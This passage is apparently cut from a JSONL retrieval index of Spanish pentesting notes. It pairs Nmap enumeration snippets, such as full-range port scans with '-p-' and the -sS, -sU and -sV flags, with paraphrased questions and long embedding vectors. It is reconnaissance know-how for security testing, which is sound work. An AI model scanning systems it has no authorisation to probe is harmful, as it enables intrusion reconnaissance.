-0.02524, -0.00601, -0.04068, -0.06245, -0.01847, -0.04452, 0.10649, -0.02717, -0.11371, -0.01275, 0.00512, 0.03812, 0.12067, -0.08623, -0.0145, 0.08406, -0.08431, 0.00619, -0.02052, -0.03277, 0.05006, -0.09787, 0.00206, 0.08578, -0.02563, 0.0314, 0.0429, 0.09105, -0.03365, -0.09758, 0.07695, 0.00555, -0.02695, -0.08197, -0.0158, -0.03729, -0.05993, 0.05953, -0.0023, -0.04261, -0.00943, -0.05004, -0.01431, -0.04818, 0.02664, 0.04524, -0.02776, 0.0196, -0.01727, -0.01832, -0.05505, 0.00731, 0.00526, 0.0256, 0.01123, -0.09126, -0.01318, 0.03064, 0.00899, -0.06857, 0.08799, 0.01594, -0.03535, 0.02402, 0.03056, 0.10977, 0.00068, -0.03613, 0.02753, 0.04671, -0.05568, 0.07001, -0.02023, 0.09279, 0.06593, 0.03578, -0.04656, 0.01599, -0.0038, 0.08551, 0.00212, -0.04184, 0.06156, 0.03361, 0.00803, 0.0467, 0.05744, -0.0152, 0.03057, -0.0856, -0.02741, 0.00749, -0.00873, 0.02036, -0.02288, -0.03274, -0.02992, 0.02221, -0.01775, -0.00966, -0.00463, -0.0257, -0.04016, 0.05223, -0.00143, -0.00542, -0.03381, 0.04777, 0.02925, -0.07937, 0.0159, 0.02811]} +{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Puertos altos TCP\n```bash\nnmap -p- --min-rate=5000 IP # los 65535, no solo top-1000\n```\n- Servicios escondidos en puertos raros (8080, 50000+...).", "indexar": "con que herramienta detecto servicios escondidos en puertos raros como 8080 o 50000?", "v": [0.28462, -0.08308, -0.12402, -0.12114, 0.04262, -0.06123, -0.01366, -0.0268, -0.04165, -0.07212, -0.12392, 0.07612, -0.03, -0.102, 0.11243, -0.08054, 0.0411, 0.04035, 0.00857, 0.04741, -0.05876, -0.00581, -0.09304, -0.0189, 0.04733, 0.01472, -0.00834, -0.04557, -0.14957, 0.1081, 0.00468, 0.08285, 0.01587, -0.00639, -0.10124, -0.09602, -0.01228, 0.03128, 0.01729, 0.07469, 0.07669, -0.00545, -0.00742, -0.08508, 0.08945, -0.05278, -0.08288, -0.0158, 0.06869, 0.04085, -0.06046, -0.14375, -0.19545, 0.01744, -0.01717, -0.10973, 0.19341, 0.07444, 0.03451, -0.08649, -0.04966, 0.04295, -0.06684, -0.0485, 0.02652, -0.11036, -0.0133, 0.0351, -0.07912, -0.02349, -0.05961, -0.00292, 0.03551, 0.06305, 0.06782, -0.05881, 0.0146, 0.01908, 0.05385, 0.03704, 0.0532, 0.0264, -0.07558, 0.00104, -0.13531, -0.11019, -0.07181, 0.05352, 0.05254, -0.12698, 0.03256, 0.03274, 0.00014, 0.12789, -0.011, 0.01487, 0.11912, -0.02786, -0.032, 0.00696, 0.15175, 0.06861, -0.14366, 0.04629, 0.03771, 0.00634, -0.07967, -0.02425, -0.0309, 0.02498, 0.07342, 0.01992, 0.06029, -0.03898, 7e-05, 0.06707, 0.05088, -0.08456, 0.06587, -0.0565, -0.06808, -0.01053, -0.01172, 0.01316, 0.02221, -0.08849, -0.1024, 0.10134, 0.07777, -0.02162, 0.0584, -0.08775, -0.13063, 0.0131, -0.03829, 0.05514, 0.03555, -0.09809, -0.05591, 0.02528, -0.01396, 0.013, -0.01309, -0.03684, 0.06096, -0.00941, 0.02482, 0.05557, -0.05256, -0.05205, -0.03562, 0.00496, -0.04468, 0.04141, -0.07671, 0.04591, 0.06101, -0.04123, -0.10158, -0.01135, -0.00734, -0.05024, -0.02072, -0.03056, 0.01929, -0.02121, 0.00161, -0.00636, 0.11833, -0.01931, -0.02253, 0.03592, -0.0575, -0.10641, -0.02097, -0.013, -0.06369, -0.05979, 0.01135, -0.07301, -0.02199, 0.04234, -0.00724, -0.07942, 0.0457, -0.07831, 0.02979, -0.12193, -0.01, 0.05358, 0.01719, 0.00417, -0.02749, 0.00771, -0.044, 0.02668, 0.02052, -0.00333, -0.00131, -0.00414, -0.03495, 0.03998, -0.03383, -0.04734, -0.08276, 0.04461, -0.07137, 0.00524, 0.01342, 0.04697, 0.00141, -0.02975, 0.01032, -0.02504, -0.05504, 0.01197, 0.0139, 0.01768, -0.01645, 0.08134, -0.05039, 0.00832, -0.00433, 0.03688, 0.04385, -0.02012, 0.0217, 0.08769, 0.07729, 0.03522, 0.03702, -0.03202, -0.04861, -0.02515, 0.02089, -0.04208, 0.01264, -0.03511, -0.02842, -0.01739, 0.0568, -0.00175, 0.04386, -0.03884, 0.01717, -0.03051, 0.00867, 0.03074, 0.01892, -0.01909, 0.02596, 0.02891, 0.08988, -0.04526, 0.03017, -0.06321]} +{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Puertos altos TCP\n```bash\nnmap -p- --min-rate=5000 IP # los 65535, no solo top-1000\n```\n- Servicios escondidos en puertos raros (8080, 50000+...).", "indexar": "cuΓ‘l es una alternativa libre a nmap para hacer un escaneo completo de puertos altos?", "v": [0.01964, -0.066, -0.14162, 0.10169, -0.04889, -0.05073, 0.06573, -0.15609, -0.28747, -0.08684, -0.09692, -0.03579, 0.06524, -0.01429, -0.04029, -0.05349, -0.03074, -0.00429, 0.12059, 0.19173, -0.16738, -0.02818, -0.10247, -0.04123, 0.00693, -0.00375, -0.04815, 0.11581, -0.09404, 0.05644, 0.00266, 0.08193, 0.05237, -0.05049, 0.07296, -0.05194, 0.19714, -0.07441, 0.08804, -0.03587, -0.04601, 0.04141, -0.06364, -0.05424, 0.05858, -0.09682, -0.10238, 0.01206, 0.01537, -0.01182, -0.04685, 0.0152, -0.05844, -0.01239, 0.02174, -0.03254, 0.08666, -0.00434, -0.00944, -0.1034, -0.08248, 0.13352, 0.04235, -0.06905, -0.07492, -0.05865, -0.06569, 0.03331, -0.00983, 0.0274, -0.03383, -0.07972, 0.06711, 0.036, -0.09482, -0.00393, -0.05438, -0.04667, 0.01791, 0.04542, 0.06791, -0.08559, -0.11122, -0.05891, -0.07411, -0.10169, -0.00195, -0.07682, 0.03435, -0.02106, 0.10718, -0.02, -0.01017, 0.11103, -0.00909, -0.0602, -0.02691, 0.04879, -0.01416, 0.08297, 0.10826, 0.06686, -0.10781, 0.03891, -0.00747, -0.0109, -0.02028, -0.02013, -0.03181, 0.0952, 0.06114, 0.1101, -0.05254, -0.04762, -0.05059, -0.06131, -0.02674, -0.06169, -0.028, 0.03015, -0.02244, -0.06236, -0.03418, -0.02211, -0.00434, 0.05531, 0.05357, 0.06188, 0.04524, 0.09698, 0.02942, -0.00391, -0.0916, -0.09871, -0.08213, -0.11273, 0.07808, -0.09463, 0.01691, 0.00504, -0.09562, 0.05212, -0.04638, -0.013, 0.00743, -0.00209, 0.01724, -0.01465, -0.0091, -0.03798, -0.00438, 0.08129, -0.07877, 0.06553, -0.05117, -0.00344, 0.04342, -0.03888, -0.01822, 0.12039, 0.05829, -0.00112, -0.02659, 0.04161, 0.04042, -0.05987, -0.025, -0.0184, -0.0928, -0.06206, -0.02742, 0.10377, 0.01162, -0.14212, 0.06692, -0.01948, 0.01818, -0.08807, -0.03709, -0.01886, -0.03973, 0.05636, -0.05935, -0.01179, -0.04631, -0.09173, 0.02027, -0.04424, 0.00593, 0.10235, 0.00114, 0.02951, -0.05469, -0.03219, -0.04309, 0.04175, 0.01829, -0.05162, -0.01123, -0.00717, -0.02061, -0.01453, 0.01712, -0.03928, -0.0065, -0.02459, -0.10556, 0.04961, 0.01983, 0.11041, 0.01498, -0.00144, 0.08425, -0.01669, -0.03483, 0.03265, -0.00836, 0.02883, 0.03068, 0.01985, -0.0157, 0.06153, 0.00128, 0.03374, -0.0221, 0.06128, 0.05126, 0.03324, -0.02771, 0.04273, 0.02707, 0.01104, -0.01532, 0.01796, 0.01235, 0.01597, 0.00491, 0.02217, -0.00567, -0.01754, 0.05738, 0.00363, -0.02548, -0.01548, -0.01541, -0.06731, -0.03833, 0.03517, -0.03814, 0.00419, -0.0394, 0.03196, -0.00112, -0.01444, 0.03474, 0.00039]} +{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa\n- Nmap por defecto escanea **solo top-1000 TCP**. Un servicio vulnerable en el 54321 es invisible si no haces `-p-`.\n- Regla: **siempre** un `-p-` completo ademΓ‘s del rΓ‘pido.\n\nRelacionado: Nmap Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "quΓ© opciΓ³n de nmap me sirve para escanear todos los puertos abiertos?", "v": [0.13954, -0.02292, -0.18013, -0.00426, 0.00419, -0.08489, 0.08033, -0.17653, -0.18535, -0.05973, -0.07746, -0.00404, 0.18626, -0.07166, -0.07882, -0.01157, 0.00778, -0.01168, 0.11524, 0.16842, -0.1261, 0.01218, -0.06736, -0.0313, -0.0032, 0.05627, -0.00963, 0.04177, -0.14431, 0.01688, -0.01659, 0.09345, 0.08186, -0.03056, 0.0705, -0.03023, 0.09621, -0.05083, 0.0995, 0.03183, -0.0009, 0.02719, -0.07696, -0.01256, 0.11525, -0.0341, -0.09525, 0.06916, -0.0318, 0.02751, -0.04706, -0.02849, -0.08745, 0.04819, -0.0762, 0.06762, -0.00126, 0.0363, 0.03635, -0.02563, -0.08015, 0.09954, -0.0089, -0.16105, -0.01535, -0.11134, -0.02127, 0.05084, -0.04667, -0.01886, -0.16241, -0.00932, 0.04153, 0.04111, -0.0618, -0.03848, -0.02054, 0.03994, 0.05494, 0.14012, 0.13481, -0.03808, -0.07703, -0.07135, 0.0161, -0.0255, -0.0429, -0.00414, 0.0217, -0.08587, 0.09224, 0.01427, -0.0195, 0.14531, -0.06264, -0.04375, -0.05439, 0.05191, -0.0173, 0.05621, 0.10132, 0.04735, -0.07594, 0.03949, -0.05408, -0.00019, 0.04867, -0.0924, 0.01334, 0.0264, 0.15312, 0.09116, -0.05823, -0.04579, -0.06498, -0.03239, -0.03271, -0.09654, -0.07589, 0.03985, -0.03171, -0.11664, 0.00887, 0.0199, -0.02731, 0.00311, 0.06564, 0.04796, 0.03176, 0.14212, -0.04449, -0.05804, -0.04651, -0.01848, -0.00771, -0.12618, 0.03172, -0.09936, 0.00259, 0.02324, -0.05055, 0.0323, -0.05016, -0.0529, 0.01742, -0.03958, 0.06771, -0.03788, -0.00465, -0.06244, 0.03023, -0.0106, -0.07827, 0.02771, -0.04648, 0.06773, 0.08122, -0.04936, -0.0228, 0.13867, -0.0546, -0.00687, -0.02808, 0.01939, 0.02741, -0.07257, -0.03775, -0.0241, -0.00655, -0.02792, 0.02896, 0.09739, -0.05416, -0.09391, 0.03755, -0.0494, -0.02968, -0.03774, -0.04821, 0.00241, -0.05488, 0.02901, -0.02821, 0.01939, -0.05839, -0.07935, -0.00555, -0.09858, -0.04615, 0.08104, 0.02513, 0.03081, -0.03935, -0.03162, -0.04874, -0.01727, -0.00764, -0.04327, 0.00349, -0.02731, 0.00116, 0.0351, 0.00894, -0.02859, 0.03632, 0.04411, -0.0714, 0.0051, -0.00785, 0.0956, -0.00011, -0.03088, 0.09291, 0.00171, 0.00526, 0.01959, 0.00074, 0.03843, 0.03082, 0.00964, -0.01719, 0.03096, -0.00184, 0.01783, -0.00208, 0.03932, 0.03507, -0.03274, 0.03084, -9e-05, 0.02071, -0.00515, -0.08129, -0.02313, 0.00553, -0.02411, -0.0229, 0.00649, -0.00765, -0.02867, 0.05149, 0.02695, -0.02432, -0.05337, 0.03939, -0.09987, -0.015, 0.06075, -0.03236, -0.01139, -0.08632, 0.01947, -0.04089, -0.03287, 0.03068, -0.00225]} +{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa\n- Nmap por defecto escanea **solo top-1000 TCP**. Un servicio vulnerable en el 54321 es invisible si no haces `-p-`.\n- Regla: **siempre** un `-p-` completo ademΓ‘s del rΓ‘pido.\n\nRelacionado: Nmap Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "cΓ³mo puedo hacer que nmap detecte servicios en puertos aleatorios mΓ‘s allΓ‘ del top 1000?", "v": [0.04222, 0.06027, -0.148, 0.01848, -0.06353, -0.02335, 0.08161, -0.00333, -0.28636, -0.04685, -0.12903, 0.04375, 0.05714, -0.06596, 0.00402, -0.05278, -0.00374, 0.00026, 0.11002, 0.07398, -0.02686, -0.02075, -0.10393, -0.10121, 0.12365, 0.02239, 0.00479, -0.00843, -0.13374, 0.0528, -0.02236, 0.00628, -0.01807, -0.0519, 0.01379, -0.06254, -0.02739, -0.01708, 0.05055, 0.02441, -0.00755, 0.06621, 0.01281, -0.05675, 0.11591, -0.0209, -0.03503, -0.01304, 0.08778, -0.05509, -0.04064, -0.02131, -0.15921, -0.01972, -0.10903, -0.00691, 0.01737, 0.05497, 0.02593, -0.13957, 0.01348, 0.06194, -0.07348, -0.06971, -0.01739, -0.11344, -0.01648, -0.0201, -0.00456, -0.06533, -0.08668, 0.00518, 0.02795, 0.05774, -0.02377, -0.02583, 0.06912, 0.01018, 0.06915, 0.04219, 0.09514, 0.02582, -0.11453, -0.05761, -0.09907, -0.06575, -0.12083, 0.03389, 0.08445, -0.22088, 0.04869, 0.0462, -0.01522, 0.12097, -0.08321, 0.01955, 0.03224, -0.05464, -0.01458, 0.09872, 0.13403, 0.06827, -0.09944, 0.07089, 0.07292, 0.02159, 0.04018, -0.02182, 0.05801, -0.00014, 0.11844, 0.02866, -0.06787, -0.08015, -0.11706, -0.00941, -0.0417, -0.12135, -0.00103, 0.02149, -0.04545, -0.08293, -0.00451, -0.03436, 0.02436, -0.02385, -0.0011, 0.0694, 0.08907, 0.04005, 0.05933, 0.03311, -0.01556, -0.04921, -0.03494, 0.0041, 0.0713, -0.0541, -0.02377, -0.01932, -0.02209, 0.03903, -0.02767, -0.05907, -0.00171, -0.03985, 0.05183, -0.01411, -0.1298, -0.01219, 0.0168, 0.01847, -0.09588, 0.03865, -0.02542, 0.07802, 0.10763, -0.085, 0.0068, 0.09569, 0.04874, 0.02183, 0.04635, 0.03176, 0.08227, 0.01682, 0.01259, 0.00826, 0.01794, 0.00849, -0.09013, 0.01452, -0.08186, -0.12979, 0.02378, 0.07941, 0.02405, -0.11525, 0.01905, -0.07456, -0.05498, 0.06862, -0.04288, -0.05186, -0.03773, -0.06338, 0.00906, -0.0875, -0.01478, 0.09718, -0.01965, -0.01205, -0.05646, 0.02429, 0.02287, -0.05983, 0.02248, -0.02114, -0.03489, -0.0264, 0.04879, -0.00052, 0.00419, -0.01325, -0.05448, -0.03121, -0.06495, 0.0479, 0.01143, 0.03008, -0.00678, 0.006, 0.05331, -0.05378, -0.07749, -0.02146, 0.00153, -0.01917, -0.01548, 0.08777, -0.02375, 0.00422, -0.04872, 0.02108, 0.00323, 0.0122, 0.09487, 0.01457, 0.08394, 0.10909, 0.0436, 0.00937, -0.02752, -0.05184, 0.01459, 0.02673, -0.03902, -0.06565, -0.0176, -0.01301, 0.00572, 0.05723, -0.00173, -0.05709, 0.01289, -0.08125, -0.0443, 0.06032, 0.02644, -0.00433, 0.04176, -0.03026, 0.03602, -0.06931, 0.05695, -0.0406]} +{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa\n- Nmap por defecto escanea **solo top-1000 TCP**. Un servicio vulnerable en el 54321 es invisible si no haces `-p-`.\n- Regla: **siempre** un `-p-` completo ademΓ‘s del rΓ‘pido.\n\nRelacionado: Nmap Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "necesito una forma rΓ‘pida de verificar si hay vulnerabilidades en cualquier puerto, ΒΏquΓ© parΓ‘metro debo usar con nmap?", "v": [0.00455, 0.05534, -0.21919, -0.03772, 0.00754, 0.04697, 0.06257, -0.12473, -0.14788, -0.14732, -0.02032, -0.03993, -0.02016, -0.02149, -0.10623, 0.00932, -0.07334, 0.00104, 0.15014, 0.06694, 0.00848, -0.11111, -0.06852, -0.12755, -0.05688, 0.1117, -0.03292, -0.00589, -0.1693, -0.0701, -0.07306, -0.00898, 0.04858, -0.04344, -0.10526, 0.02762, 0.16512, -0.05631, 0.09081, 0.12929, 0.03223, 0.10931, 0.01432, 0.00297, 0.09332, -0.00904, -0.06646, -0.1375, -0.10751, 0.03306, 0.02487, 0.10765, -0.1795, 0.02197, -0.14522, -0.05622, 0.06208, 0.01615, 0.01696, -0.07868, -0.05133, -0.02527, 0.06303, -0.0242, -0.09485, -0.06384, -0.02069, -0.01754, -0.11104, -0.04938, -0.04002, -0.01843, -0.01793, 0.04071, -0.01539, -0.00954, -0.01694, -0.06238, 0.09765, 0.10511, 0.001, 0.10329, 0.0482, -0.11013, -0.1567, -0.07449, 0.08245, -0.00382, 0.07293, -0.05757, 0.08082, 0.03861, -0.01237, 0.03156, -0.0668, -0.0389, -0.06249, 0.10404, -0.05865, 0.08725, 0.07079, -0.03802, -0.04675, 0.0335, -0.03111, 0.00136, -0.06908, -0.02313, 0.01434, -0.02502, 0.10937, 0.00827, -0.10413, -0.10914, 0.01678, -0.00725, -0.01101, -0.14856, -0.00092, -0.00392, -0.05903, -0.06002, 0.00938, -0.02137, 0.01177, 0.00027, 0.08324, 0.06459, 0.03729, 0.07373, 0.0237, -0.10786, -0.10109, -0.02017, -0.02849, 0.04606, -0.00847, -0.08223, -0.01355, 0.03311, -0.00409, 0.01304, -0.05266, -0.02034, 0.03366, 0.06681, -0.03034, -0.00244, -0.13782, 0.00125, 0.05923, 0.0075, -0.05751, 0.05131, -0.05327, -0.05582, 0.06574, -0.0705, -0.02451, 0.03424, 0.05797, 0.00057, 0.02309, 0.05145, -0.01283, -0.0545, 0.05711, 0.01316, 0.08141, -0.03112, -0.00138, 0.06172, -0.03024, -0.03964, 0.07621, 0.00614, -0.04014, -0.0191, -0.04842, -0.05843, -0.01209, 0.02663, -0.02198, 0.04978, -0.03865, 0.02252, 0.05648, 0.00926, 0.06494, 0.10701, 0.00994, -0.01422, 0.00902, 0.02021, 0.04028, 0.02895, -0.01247, -0.01298, -0.01054, -0.06836, -0.03306, -0.00467, -0.06567, -0.06452, 0.0789, 0.04501, -0.07339, -0.01233, 0.00473, 0.05317, 0.0288, -0.0054, 0.0698, -0.03867, -0.03151, -0.01685, -0.02318, 0.04385, -0.00614, -0.03147, -0.01595, 0.04198, -0.0139, 0.06661, 0.02461, 0.02043, 0.00325, -0.0019, 0.03592, 0.05758, 0.01755, 0.03368, -0.07566, -0.03246, 0.0415, -0.04007, 0.00092, -0.02285, -0.02737, -0.07481, 0.04032, 0.0381, -0.0105, -0.01002, -0.01577, -0.02699, -0.07829, 0.05156, -0.05972, -0.05756, -0.04648, 0.03489, 0.01294, -0.0653, 0.01035, -0.0201]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Nmap\n\n> `-sS` = TCP SYN Β· `-sU` = UDP Β· `-sV` = versiΓ³n. Parte de EnumeraciΓ³n.", "indexar": "que herramienta es para hacer escaneos de puertos y detectar versiones de servicios?", "v": [0.13023, -0.06838, -0.21634, -0.21247, 0.0519, -0.14139, 0.03476, -0.12841, -0.04578, -0.03618, -0.12182, 0.04123, -0.02827, -0.11376, 0.10397, -0.00206, 0.07261, -0.08871, 0.06995, 0.04248, -0.07752, -0.00204, -0.08521, 0.01847, -0.08457, 0.02274, -0.0355, -0.04797, -0.12474, 0.1048, -0.03581, 0.02791, 0.06423, -0.01538, -0.08895, -0.12166, -0.00092, -0.08757, 0.10736, 0.08622, 0.07287, 0.04018, -0.02122, -0.03731, 0.07138, -0.083, -0.05052, 0.02473, 0.07433, 0.05806, -0.02209, -0.12528, -0.17168, 0.03223, -0.04412, -0.13532, 0.14917, -0.01579, 0.01201, -0.17289, -0.08226, 0.07409, -0.05582, -0.03285, 0.03569, -0.09226, -0.00829, -0.00335, -0.05784, 0.037, -0.07319, 0.01969, 0.09783, 0.05877, -0.04402, -0.10798, 0.01739, 0.05668, 0.03602, 0.06383, 0.05456, -0.00976, -0.09023, 0.02419, -0.06037, -0.0976, -0.08271, -0.00932, 0.08597, -0.17864, 0.03306, 0.03566, -0.01784, 0.09457, -0.0321, -0.01351, 0.12925, -0.03758, -0.025, -0.00425, 0.12323, -0.03462, -0.07557, 0.09174, -0.04642, -0.01017, -0.0029, -0.04515, -0.03915, 0.00787, 0.08891, 0.0357, 0.04398, -0.02733, -0.04008, 0.0543, 0.03911, -0.05746, -0.03673, 0.04622, 0.00963, -0.052, -0.08304, -0.0837, 0.02715, -0.03161, -0.02502, 0.07015, 0.02023, -0.06145, 0.04735, -0.07688, -0.08964, -0.056, -0.06961, 0.00729, 0.02586, -0.16062, -0.01245, -0.04762, -0.06978, 0.06309, -0.04537, -0.00908, 0.03739, 0.02988, -0.00935, -0.00126, -0.03025, -0.03161, 0.05958, 0.00099, -0.12335, 0.03233, -0.05948, -0.01725, 0.05581, 0.00546, -0.1077, 0.07744, -0.01491, -0.02516, 0.0629, -0.00607, 0.02252, -0.04063, 0.05226, 0.0404, 0.05401, 0.00589, 0.00198, 0.06913, 0.02457, -0.09478, 0.01715, 0.00572, -0.01966, -0.02101, -0.03314, -0.03256, -0.047, 0.01533, -0.0418, -0.08095, 0.00946, -0.06055, 0.00245, -0.06646, -0.02897, 0.03951, 0.03943, -0.00957, -0.01108, -0.02764, 0.05234, 0.05528, 0.02724, -0.01537, 0.02166, -0.02133, -0.06286, -0.01657, -0.00744, -0.04885, -0.00643, 0.03958, -0.03133, 0.00873, 0.04545, 0.03711, 0.01307, 0.03026, -0.00586, -0.03624, -0.01978, -0.0006, -0.04061, 0.04981, 0.02515, 0.04496, -0.06682, -0.00322, 0.00294, 0.03009, -0.0359, 0.02573, 0.06231, 0.03085, 0.04501, -0.00918, 0.06902, -0.02677, -0.01636, -0.02575, -0.00247, -0.07253, 0.05932, -0.00652, -0.04693, -0.06445, 0.02034, 0.00197, 0.04802, -0.00304, 0.0133, -0.05892, 0.0497, -0.02193, 0.01216, -0.01239, -0.05292, 0.0323, 0.04226, -0.07652, 0.03336, -0.0317]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Nmap\n\n> `-sS` = TCP SYN Β· `-sU` = UDP Β· `-sV` = versiΓ³n. Parte de EnumeraciΓ³n.", "indexar": "con que programa puedo verificar quΓ© servicios estΓ‘n activos en un servidor?", "v": [0.01776, 0.17384, -0.16646, -0.12779, 0.05195, -0.10405, 0.09459, -0.13395, -0.06425, -0.1173, -0.08771, -0.10302, 0.01791, -0.06338, 0.11276, 0.0549, 0.13011, -0.2023, 0.12071, 0.13794, 0.07616, -0.04409, 0.02385, -0.03258, -0.09805, 0.11387, 0.0174, -0.05239, -0.03504, -0.01879, 0.04351, -0.09471, 0.04508, -0.06835, 0.06553, -0.00196, 0.01596, 0.10143, 0.03654, 0.07737, 0.02165, -0.01557, 0.03152, -0.04443, 0.08882, 0.03221, 0.0194, -0.13199, 0.00936, -0.04001, -0.03512, -0.03254, -0.11055, -0.01292, -0.03198, -0.00192, -0.04224, -0.12993, 0.01789, -0.06297, -0.08084, 0.03857, 0.02743, -0.04907, 0.08382, 0.01735, 0.08141, -0.00725, -0.02968, -0.01926, -0.04984, 0.02021, 0.01721, -0.04779, -0.04998, 0.01169, 0.04904, -0.09795, 0.00092, 0.0743, -0.00339, 0.10231, 0.0175, 0.13226, -0.12685, -0.12833, -0.03133, -0.0834, 0.03637, -0.06853, 0.06006, 0.13612, -0.03951, 0.1454, -0.0354, 0.08791, 0.13208, 0.00119, 0.03304, 0.03726, 0.1025, 0.03394, -0.07012, 0.0943, -0.00055, 0.09247, 0.08859, -0.02344, -0.03531, -0.01805, 0.03595, -0.04534, -0.07508, -0.06384, -0.04121, 0.02455, -0.07547, -0.04588, 0.06093, 0.03703, -0.07041, 0.01479, -0.00438, 0.06101, 0.09298, -0.03978, 0.02901, 0.05244, -0.00647, 0.0335, 0.00216, -0.02351, -0.06845, -0.05552, -0.05763, -0.06304, 0.04003, -0.01678, -0.004, -0.04081, 0.03822, 0.03419, 0.04532, 0.02821, 0.11834, -0.02325, 0.05053, -0.06503, -0.07611, 0.04789, 0.04792, -0.03839, -0.05686, 0.08533, -0.10059, -0.02419, 0.05386, -0.06053, -0.04878, 0.07227, -0.00941, 0.00597, 0.01064, 0.05078, 0.03274, 0.01052, 0.01412, 0.03955, 0.06965, 0.07465, -0.09662, 0.01358, 0.02635, -0.10575, 0.02411, 0.02706, -0.04928, -0.05658, 0.07236, -0.04957, -0.09501, 0.00194, 0.01644, -0.00189, -0.07909, -0.03043, -0.03866, 0.01708, -0.00089, -0.0089, 0.04216, 0.02188, -0.05389, 0.05545, 0.05472, -0.04434, -0.04523, 0.00232, -0.00418, -0.09384, -0.0421, -0.03455, -0.0209, -0.03782, 0.0146, 0.04697, -0.0306, 0.05633, 0.03041, 0.06202, -0.00847, -0.02772, 0.14404, -0.02873, -0.05572, -0.01478, 0.02868, 0.00153, 0.00681, -0.00146, -0.02022, -0.02159, 0.00831, 0.00044, 0.01941, -0.03354, 0.05317, 0.03802, 0.08207, 0.05405, -0.03807, -0.01564, -0.06815, -0.01976, 0.04171, -0.01633, 0.05028, -0.041, 0.00474, -0.0732, 0.02714, 0.09244, -0.00962, -0.07431, 0.01199, 0.00646, -0.04592, -0.01048, -0.01192, -0.03276, -0.00695, -0.0076, 0.04565, -0.068, 0.04887, -0.02126]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Nmap\n\n> `-sS` = TCP SYN Β· `-sU` = UDP Β· `-sV` = versiΓ³n. Parte de EnumeraciΓ³n.", "indexar": "cual es una alternativa a nmap para mapear una red?", "v": [0.03867, 0.00261, 0.06928, -0.06319, -0.11329, 0.0576, -0.08443, 0.04152, -0.20712, 0.01919, -0.04414, -0.2312, 0.11542, -0.04447, -0.01249, 0.06952, -0.08622, 0.06859, 0.20901, 0.02094, -0.06192, 0.02265, -0.18924, 0.02999, -0.04323, 0.13106, 0.01205, -0.00396, -0.11734, -0.01405, -0.02962, 0.00192, -0.03601, -0.09907, -0.13513, 0.07436, 0.22176, -0.05882, -0.02195, -0.01544, -0.15988, -0.02852, -0.04478, 0.10751, -0.0373, -0.02109, -0.09089, 0.06049, -0.00838, 0.05642, -0.08152, -0.00544, -0.15462, -0.0354, 0.02728, -0.00744, 0.03358, -0.076, -0.04569, 0.02816, -0.06758, 0.00735, -0.08529, -0.08127, 0.02938, -0.03761, -0.05305, -0.07188, -0.07653, 0.03868, 0.0353, 0.06904, 0.02684, 0.01133, -0.08191, 0.03306, 0.00014, -0.11094, 0.04922, 0.04803, 0.08287, 0.00537, -0.10546, 0.02995, 0.00792, -0.09033, 0.0541, -0.03049, 0.01533, -0.00507, -0.00207, 0.05045, 0.079, 0.1128, 0.001, -0.12144, -0.03818, -0.01911, -0.09647, 0.01359, 0.0164, 0.08132, -0.13032, -0.02537, 0.00384, -0.02248, -0.0118, 0.13055, -0.0162, 0.08696, 0.10185, 0.07061, -0.05426, 0.03316, 0.10212, -0.1153, 0.03955, 0.06425, -0.04448, -0.08699, -0.05555, 0.05338, -0.06252, -0.03481, 0.0309, 0.08167, 0.00391, -0.01468, 0.02506, 0.09488, -0.02037, -0.02387, 0.00391, -0.07417, -0.09087, 0.00707, 0.02261, -0.05774, 0.05381, 0.09388, -0.05719, -0.02431, -0.04946, -0.11988, -0.0276, 0.0551, 0.05408, -0.01877, 0.03131, 0.02131, -0.04879, 0.03855, -0.05834, 0.02942, 0.01569, 0.12163, -0.03033, 0.01045, -0.08111, 0.0982, 0.02235, -0.04608, 0.03755, 0.05106, -0.00856, -0.03588, 0.03405, 0.01231, -0.01283, -0.05696, 0.00115, 0.0307, -0.02103, -0.05406, 0.01452, -0.03694, -0.02254, -0.0571, 0.03861, -0.0204, 0.05093, -0.05114, -0.00641, 0.07416, -0.01502, -0.04626, 0.0208, 0.03511, -0.02673, -0.03909, -0.0514, 0.01636, 0.03439, -0.01533, 0.00321, 0.01714, 0.09987, -0.05004, -0.08775, -0.03026, -0.03692, 0.02504, -0.02711, 0.04252, -0.05046, -0.00985, -0.00702, 0.04333, -0.00785, 0.05549, 0.01382, 0.03316, 0.04911, 0.01508, -0.0408, -0.00752, 0.00483, 0.01829, 0.03377, -0.06492, 0.08708, -0.00039, -0.02382, 0.06563, -0.04317, 0.02105, 0.01176, -0.019, -0.03467, -0.01479, 0.0682, -0.04244, 0.03457, 0.06539, -0.04295, -0.01884, 0.03292, 0.03059, 0.04501, -0.04493, 0.06285, 0.02387, -0.03701, 0.00688, -0.02127, 0.01194, -0.02816, -0.00883, -0.04043, -0.01404, 0.00312, -0.0032, 0.0198, 0.01311, 0.06201, 0.04482]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - 